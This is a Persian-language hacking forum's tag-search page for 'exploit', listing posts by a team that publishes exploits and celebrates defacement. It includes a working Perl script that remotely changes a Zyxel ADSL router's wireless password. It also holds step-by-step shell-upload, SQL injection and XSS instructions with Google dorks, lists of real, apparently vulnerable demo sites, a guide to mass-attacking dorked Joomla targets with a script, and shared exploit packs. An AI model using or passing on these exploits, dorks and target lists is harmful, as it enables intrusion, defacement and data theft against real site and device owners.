جستجو در تالار

در حال نمایش نتایج برای برچسب های 'اکسپلویت'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


Product Groups

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالار ها

  • اخبار و اعلانات انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • بخش مسابقات انجمن
    • انتقادات و پیشنهادات
    • افتخارات و اطلاعیه های تیم گارد ایران
    • بخش ارتقاء کاربران
    • اخبار هک و امنیت
    • اکسپلویت های ثبت شده توسط تیم امنیتی گارد ایران
    • برنامه ها و ابزارهای نوشته توسط گارد ایران
  • بخش های خصوصی انجمن گاردایران
    • سوال و جواب های عمومی
    • بخش خصوصی
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • بخش کرک و رمزنگاری
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Mikrotik
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

دسته ها

  • ویدیوهای آموزشی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


محل سکونت


Interests

14 نتیجه پیدا شد

  1. سلام خدمت اعضا محترم گارد ایران. خوب در این پست بنده قصد دارم که اکسپلویت نویسی رو به شما عزیزان آموزش بدم. بعضی از دوستان میپرسیدن که چطوری اکسپلویت ثبت میکنی و باگ پیدا میکنی و.. به همین خاطر تصمیم به ساخت این مجموعه گرفتم. خوب من از جناب گوگل برای ثبت اکسپلویت استفاده میکنم ولی اگر استقابال بشه از ابزارهای لینوکس هم میزارم. اهداف بنده از ایجاد این تاپیک: 1-کمک به افزایش سطح علمی عزیزان گارد ایران. 2-بالابردن تیم در بین تیم ها ثبت اکسپلویت 3-افزایش روز به روز تعداد اکسپلویتر و دیفیسر های تیم. اموزش پیدا کردن باگ هایxss,lfi,sql,shell upload,..در cms های مختلف==>اکسپلویت کردن==>ریپورت دادن=ثبت شدن باگ خوب دوستان گفته باشم استقبال نشه تاپیک دیر به دیر آپدیت میشه. به امید روزی که نام تک تک شما عزیزان رو در بخش ثبت اکسپلویت ببینیم.
  2. ثبت اکسپلویت از پیام رسان سروش که چند وقت پیش پیدا کرده بودیم و امروز ثبتش کردیم. https://cxsecurity.com/issue/WLB-2018040097 ############################################### # Title : Soroush Messenger Information Leak Exploit # Date : 10 April 2018 # Vendor : https://soroush-app.ir/ # Software : https://android.sapp.ir/ # Author : GIST # Tested on : Android 4.4.2 # Exploit Type : Local # Version : All Versions # Youtube : https://youtu.be/Sl2v4Dh_9r0 ########################################### Description : Soroush Is a Most popular Messanger in iran With 3 mil User In Iran. There Is a problem in this messenger and that is The Sources not encrypted. Also When we send an messsege to the other contacts his phone numbers will save in Local database. We Can View The Sources Just With Installing The CheatDroid and allow the premission. You Can See The Details of the Exploit in youtube Youtube : https://youtu.be/Sl2v4Dh_9r0 Informations : File name : ott.db Database Name : members Strings Leaked : member_nick_name , member_avatar_url , members_avatar_thumbnail_url , members_user_id , members_soroush_id ,members_standars_phone_numb , members_standars_phone_number , members_last_online and ...
  3. ثبت اکسپلویت Iranian Social Network Multiple Exploit https://cxsecurity.com/issue/WLB-2018040098 ########################################################## # Title : Iranian Social Network Multiple Exploit # Date : 12 April 2018 # Tested on : Ubuntu/Windows 10 # Google Dork : inurl:/register.php intitle:شبکه اجتماعی # Google Dork2 : inurl:/news2.php?id= intitle:شبکه اجتماعی # Author : GIST # Vendor : http://sana-net.com/ # Exploit Type : Remote # Version : All Version # CVE : - ########################################################### Description : Iranian Social Network Have Multiple Vulnerablity (Sqli , Xss , File Upload). We can inject and download database or upload shell. For using this vulnerabilities first you have to register with fake information then you can use the vulnerabilities Sql Injection : Url : site.com/search_prof.php?op=3&ostan=1219&vez=1219&sen1=1219&jensu=1219&city=1219&picu=1219&vsalamat=1219' Request Method : Post -- response -- HTTP/1.1 200OK Server nginx/1.4.6 (Ubuntu) Date: Thu, 10 mar 2016 19:18:47 GMT Content-Type: text/html Transfer-Encoding: Chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.5.9-1ubuntu4.14 Expires: Thu, 19 Nov 1981 08:51:00 GMT Cache-Control: no=store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragme: no-cache Content-encoing: gzip Xss : URL : site.com/search_prof.php?op=3&ostan=1219&vez=1219&sen1=1219&jensu=1219&city=1219&picu=1219&vsalamat=1219 commands : <script>alert('Xss')</script> or "><script>alert('Xss')</script> File Upload : URL : /editprofilepic.php Method : Post Convert .php to .jpg and choose your shell and bypass file to .php with live http header. Directory Shell : site.com/images/users/shell.php
  4. DeMoN

    به نام خدا با عرض سلام. بعد از یک مدت نسبتا طولانی با یک دوره آموزشی مفید در زمینه تست نفود و امنیت در خدمت شما هستیم. قبلا ما دوره ای رو با نام اکسپلویت نویسی داشتیم و در این دوره ما آسیب پذیری های مختلف رو با استفاده از زبان پرل اکسپلویت میکنیم. پیش نیار دوره زبان برنامه نویسی پرل است که ما در این دوره سعی میکنیم توضیحاتی مخنصر رو راجع به قطعه کد ها هم بدیم تا تمام عزیزان بتونن استفاده کنند. سرفصل ها: 1-توضیحات ابتدایی و آشنایی با دوره 2-آشنایی مختصر با آسیب پذیری ها(قبلا دوره ای رو داشتیم برای کشف آسیب پذیری ها . لینک) 3-آشنایی با ماژول های پرکاربرد در اکسپلویت نویسی با پرل 4-آشنایی با دستورات پرکاربرد در این دوره 5-شروع و نوشتن اولین اکسپلویت به زبان پرل 6-آموزش کار با فایل ها و دایرکتوری ها 7-آموزش کار با متد POST و GET برای ارسال و دریافت درخواست ها به سرور 8-آموزش کار با پروتکل های مختلف 9-آشنایی با وب سرورها 10-آشنایی با Header ها و تجزیه و تجلیل آنها 11-تجزیه و تحلیل وب سرور اسیب پذیر برای نوشتن اکسپلویت 12-آموزش Perl CGI 13-آموزش نوشتن اکسپلویت برای انواع آپلودر ها 14-نوشتن اکسپلویت برای انواع CMS ها 15-توضیحات تکمیلی و پایان دوره امیدوارم از این دوره نهایت بهره رو ببرین. با تشکر های خودتون برای ادامه دوره به ما دلگرمی بدین. موفق و پیروز باشید.
  5. ثبت اکسپلویت ( Zyxel P-660HW-TI V3 ADSL CSRF ( change password #!/usr/bin/perl ########################################################### # Title : Zyxel P-660HW-TI V3 ADSL CSRF ( change password ) # Author : dr-iman/GIST # Exploit Type : Perl/Remote # Date : 3 Feb 2018 # Vendor : https://www.zyxel.com/support/DownloadLandingSR.shtml?c=gb&l=en&kbid=MD08229&md=P-660HW-T1%20v3 # Tested : Ubuntu - Windows 10 # GIST : c0d3!nj3ct!0n , REX , 0r0b4s , Mownten , AliZombie , MR.Python , Phoen1X ########################################################### # Zyxel P-660HW-T1 v3 Wireless ADSL Have CSRF Vuln.We can Remotly Change Password Wireless. # The reason for this vulnerability Is After entering the address (change the password) System Will Not Checked Te Password Field # Items needed : Wirelesss ADSL IP , NeW Password # There Is 3 Update For This ADSL Router . All versions are vulnerable use LWP::Simple; use LWP::UserAgent; use HTTP::Request; use HTTP::Request::Common qw(POST); use HTTP::Request::Common qw(GET); use IO::Socket; my $ua = LWP::UserAgent->new; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print <<logo; _____ _ _____ _ _ _ |__ |_ _ _ _ ___| | | __|_ _ ___| |___|_| |_ ___ ___ | __| | |_'_| -_| | | __|_'_| . | | . | | _| -_| _| |_____|_ |_,_|___|_| |_____|_,_| _|_|___|_|_| |___|_| |___| |_| logo print "\nEner IP Address : "; $ip=<>; chomp($ip); print "\nEnter New Passwword : "; $pass=<>; chomp($pass); $url = "$ip/wzPPP.html"; my $content = $ua->get("$url")->content; if ($content =~ /Internet Configuration/ ) { my $wan = $ua->post($url, Content => [ 'next >' => 'submit',]); } my $content = $ua->get("$wan")->content; my $wan2 = $ua->post($content, Content => [ 'wzEnableWLAN' => 'WLANACtive', 'next >' => 'submit',]); my $content = $ua->get("$wan2")->content; my $lan = $ua->post($content, Content => [ 'wzWLANCfgHPSK' => $pass, 'next >' => 'submit',]); my $content = $ua->get("$lan")->content; my $fin = $ua->post($content, Content => [ 'Apply' => 'submit',]); if ($fin =~ /Congratulations/) { print "\nPassword Changed Successfully !\n"; } else{ print "\nProcess Failed !!\n"; }
  6. cxsecurity url : https://cxsecurity.com/issue/WLB-2017090213 ############################################################################## # Title:fast-signup shell uploading # vendor: n/a # Exploit Author : Guardiran Security Team # Tested On : ubuntu / Windows 8.1 # # Dork: inurl:fast-signup.php # # ----------------------------------------------- # # # Description : # an uncontrolled profile image uploader enables attacker to upload shell remotely # # # # # # POC: # first find targets with the dork above and signup by uploading a normal photo in this step. then # login(sometime it will login automatically) after that go to "My Photo" click on "Manage My photo" # "Modify Photo 1" now upload your shell.php here :) open your profile photo(the shell you uploaded) # url will be like this: # http://sitedomain.com/photoprocess.php?image=memphoto1/209975shell.php&amp;square=100 # # change it to this order: # http://sitedomain.com/memphoto1/123456shell.php # Now you are done :) # 123456 is a random number that the website will add to your file name so it can be any thing else # # Bypass: # in some of targets i saw that they have denied .php file so upload your shell as .PHP :) # # # # ############################################################################## exploit.txt
  7. proxy

    معنی هک: هک به معنی سود بردن از یک روش سریع و هوشمندانه برای حل یک مشکل در رایانه می‌باشد. در علوم مربوط به رایانه معنی هک گاه مساوی معنی کرک (crack) که رمزگشایی است نیز عنوان می‌شود. در گفتگوهای امروزی هک به معنی نفوذ به یک سیستم رایانه‌ای است؛ و کرک نیز به معنی رمزگشایی است و کراکر (به انگلیسی: Cracker) به فرد گشاینده رمز می‌گویند. باگ چیست؟ باگ نوعی خطا یا اشتباه در اجرای نرم افزار است که موجب نتایج اشتباه یا اجرا نشدن نرم افزار می‌شود. علت این اشکالات می‌تواند اشتباه در هنگام برنامه نویسی باشد. شرکت های سازنده نرم فزارها برای حل این مشکل قبل از ارائه نسخه نهایی نسخه‌هایی تحت نام بتا یا آلفا انتشار می‌دهند تا افرادی آنها را بررسی کنند و این باگ‌ها را گزارش کنند. و هکر میتواند با استفاده از باگ به نرمافزار نفوذ کرده و به هدف خود برسد. شل چیست؟ شل یک ابزار برنامه نویسی شده است که هکر با آپلود کردن اون روی سایت می تواند کارهای مورد نظر خودش رو مانند حذف یا دانلود فایلها و خواندن اطلاعات دیتابیس یا ... رو انجام دهد سی ام اس چیست؟ سی ام اس یا cms سیستم مدیریت محتوا مانند جوملا و وردپرس و..... پورت چیست؟ به راه های ورودی و خروجی اطاعات در سیستم پورت گفته میشه که مانند درهای یک خونه هستند اکسپلویت چیست؟ زمانی که هکر یک باگ رو کشف میکنه برای اینکه بتواند دفعه بعد با سرعت بیشتری نفوذ رو انجام بدهد یک کد مینویسد که عمل نفوذ رو انجام دهد که به آن اکسپلویت گفته می شود. آی پی چیست؟ به آدرس یک سیستم در بستر اینترنت یا شبکه آی پی ip گفته میشود دفیس و مس دفیس چیست؟ زمانی که صفحه سایت مورد نفوذ تغیر پیدا کرد در اصطلاح میگویند که سایت دفیس شده است حال اگر صفحه چند سایت با آی پی های یکسان تغییر پیدا کند میگویند که مس دفیس اتفاق افتاده است بایپس چیست؟ به عبور کردن از موانع بایپس میگویند مانند وقتی به سایتی نفوذ می کنید که safe mode آن فعال هست برای اجرا کردن دستورات خود بر روی شل به مشکل بر می خورید و دلیل آن هم وجود firewall سرور هست . برای اینکه بتوانید دستورات خود را بر روی شل اجرا کنید ولی firewall گیر ندهد باید آن را bypass (دور زدن firewall ) کنید . اگه چیزی رو از قلم انداختم بگید فقط دوستان لطف کنید به چت روم تبدیل نکنید اینجا رو ممنون
  8. سلام. این کتاب توسط تابیس کلین نوشته شده و در مورد تجربیات او در زمینه ی حفره یابی و اکسپلویت نویسی است. فعلا فصل های یک و دو این کتاب ترجمه شده،در صورت ترجمه شدن ،ب قیه فصول در همین تاپیک قرار خواهند گرفت از نرم افزار هایی که ایشون باگ یابی کردن می توان vlc player رو نام برد. رمز: guradiran.org 1.rar
  9. * Title: puzzle creator CMS File Upload vulnerability * date: 4/22/2017 * Exploit Author : Gudrdiran Security Team * Google Dork : intitle:"puzzle creator" "index.php=difficulty=" * Softwar Link : http://www.puzzle-maker.com/ * Vendor Homepage: https://www.nimble.com/ * Tested On : Kali Linux w3af / Windows 8.1 ---------------------------------- Description : Hello Guys This is a file upload exploit we can upload our shell With Tamper data or Live Http Header Dir Shell: When You Bypass Your Shell With Tamper Data Or Live Http Header Target Will Be Shown you The URL( Shell ) Usually Dir Shell : /puzzle/name_shell.php Poc: Page vulnerable : [/puzzle/] Exploit : /puzzle/upload.php Demo: http://www.brandonbrady.com/puzzle/upload.php http://www.kidtopia.info/puzzle/upload.php http://www.teachertopia.info/puzzle/upload.php * Special Tnx : cod3!nj3ct!0n , REX , alizombie , abarestan , MR.IMAN , reza attacker , No_one , dastmale-sorkh , 1TED , Reza Attacker , J.ALL_Editor , S9pY, * Discovered By : DeMoN * We Are Guardiran Security Team https://cxsecurity.com/issue/WLB-2017040150
  10. باگ FBDj Stats cms Sql Injection Vulnerability ثبت شده توسط تیم امنیتی گارد ایران ########################### # FBDj Stats cms Sql Injection Vulnerability ########################### ########################### # FBDj Stats cms SQL Injection Vulnerability ########################### # Exploit Title: FBDj Stats cms SQL Injection Vulnerability # Date: 16/08/2016 # Exploit Author: Guardiran Security Team # Google Dork: inurl:\"playerdetails.php?id=\" # Version: All Version # Tested on: windows 10,kali linux,windows 8.1 HEllo Guys. This Is a Sql Injection Vulnerability You Can Inject The Sites Without Sql Injection Bug â��------------------------------â�� SQL INJECTION : This CMS And Also Have sqli Vulnerability. We Can inject the Bug As follows ... Bug in : [$site]/[Patch]/playerdetails.php?id=[sql] Demos : http://ts3.virtualpilots.fi/playerdetails.php?id=558 http://stats.acesovereurope.org/playerdetails.php?id=1659 http://www.dutcharcade.com/Sturmovik/playerdetails.php?id=2192 www.battle-fields.com/BF1stats/playerdetails.php?id=1 * Special Tnx : cod3!nj3ct!0n , REX , alizombie , dastmale-sorkh ,Comrade,Abarestan, Reza.attcker , 1TED , J_All_Editor * Discovered By : 1TED * We Are Guardiran Security Team * Guardiran.org ########################### ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2016-08-18] ###########################
  11. DeMoN

    ####################################################################### # # Exploit Title: Cms Made Simple multi vulnerability 1.11.10 # Date: 2014 12 June # Author: Dr.3v1l # Vendor Homepage: http://www.cmsmadesimple.org # Version : 1.11.10 # Tested on: Windows # Category: webapps # Google Dork: intext:"powered by CMS Made Simple" # ####################################################################### # # [+] Exploit : # # Cross site scripting (xss) : # # POST input <default_cms_lang> was set to <fa_IR" onmouseover=prompt(3v1l) bad="> # http://<server>/cmsmadesimple/Install/index.php?sessiontest=1'>http://<server>/cmsmadesimple/Install/index.php?sessiontest=1 # http://<server>/cmsmadesimple/Install/index.php # # Host header attack : # # http://<server>/cmsmadesimple/admin/login.php # # PoC : cmsmadesimple\admin\themes\NCleanGrey\login.php # # . # . # . # # <p id="img"><?php echo lang('login_info')?>:</p> # <?php echo lang('login_info_params')?> # # // #vulnerability is here # <span>( <?php echo $_SERVER['HTTP_HOST'];?> )</span> # // --end # # </div> # </div> # <div class="login"> # . # . # . # . # # -------------------------- # # /cmsmadesimple/index.php # ####################################################################### # # [+] Contact Me : # # B.Devils.B@gmail.com # Twitter.com/Doctor_3v1l # IR.linkedin.com/in/hossein3v1l # http://about.me/Hossein.Hezami # https://www.facebook.com/hossein3v1l # http://doctor3v1l.tumblr.com # http://instagram.com/doctor3v1l # Hossein Hezami - Black_Devils B0ys # ####################################################################### # B.Devils.B Friends , R.H.H (UnderGround) , IeDB.IR , Emperor Team # specially of brother Medrik for keep me again researching .. ####################################################################### سلام خدمت دوستان عزیز گارد ایران. خوب در این تاپیک براتون تمامی اکسپلویت های سرور های لینوکس رو قرار میدم و امیدوارم لذت ببرین. یا حق
  12. سلام خدمت دوستان عزیز گارد ایرا.خوب اینم از یک مجموعه کامل از ذدورک و اکسپلویت های 2014. پکیج کاملیه و میشه باهاش سایت های زیادی رو زد. pass:guardiran.org یا حق New Folder (2).rar
  13. DeMoN

    با سلام خدمت دوستان گل 'گارد ایران. سایت 1337day سایتی هست برای خریدو فروش اکسپلویتها و این تاپیک رو زدم تا اکسپلویت ها رو پاپلیک کنم و رفیقای خودم الکی پول هنگفتی به سایت هایی مثل این ندن و شما هم اگر چیزی داشتید که مربوط میشد و قصد پاپلیکش رو داشتید که به این سایت مربوط میشد در این جا قرار بدید تا پراکنده نشه فقط اسپم نکنید سوالی داشتید پ خ کنید اولیشو میزارم به نام: vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day لینک خریدش که به قیمت 500gold هست : http://1337day.com/exploit/description/20002pass:guardiran.orgNew Text Document.rar
  14. این اسکریپت همونطور که از اسمش پیداس برای باگ com_tag نوشته شده که می تونید اموزش روش دستیش رو از اینجا ببینید http://guardiran.org/forums/index.php?/topic/890-%D9%87%DA%A9-%D8%B3%D8%A7%DB%8C%D8%AA-%D8%AC%D9%88%D9%85%D9%84%D8%A7-%D9%87%DA%A9-%D9%BE%D8%B3%D9%88%D8%B1%D8%AF-%D8%AC%D9%88%D9%85%D9%84%D8%A7/#entry2650 خب حالا طرز استفاده از اسکریپت: اول دورک زیر رو سرچ کنید inurl:index.php?option=com_tag حالا چنتا تارگت انتخاب کنید و ادرسشون رو توی یک فایل ذخیره کنید (به همراه http:// و / اخر) مثل زیر /http://target.com/http://site.com/http://example.com حالا برای هک کافیه تو cmd بزنید perl com_tag.pl targets.txt targets.txt همون فایلیه که شما ادرس تارگت هارو توش ذخیره کردید بقیه کار هارو اسکریپت انجام می ده و نتیجه رو براتون می نویسه com_tag.rar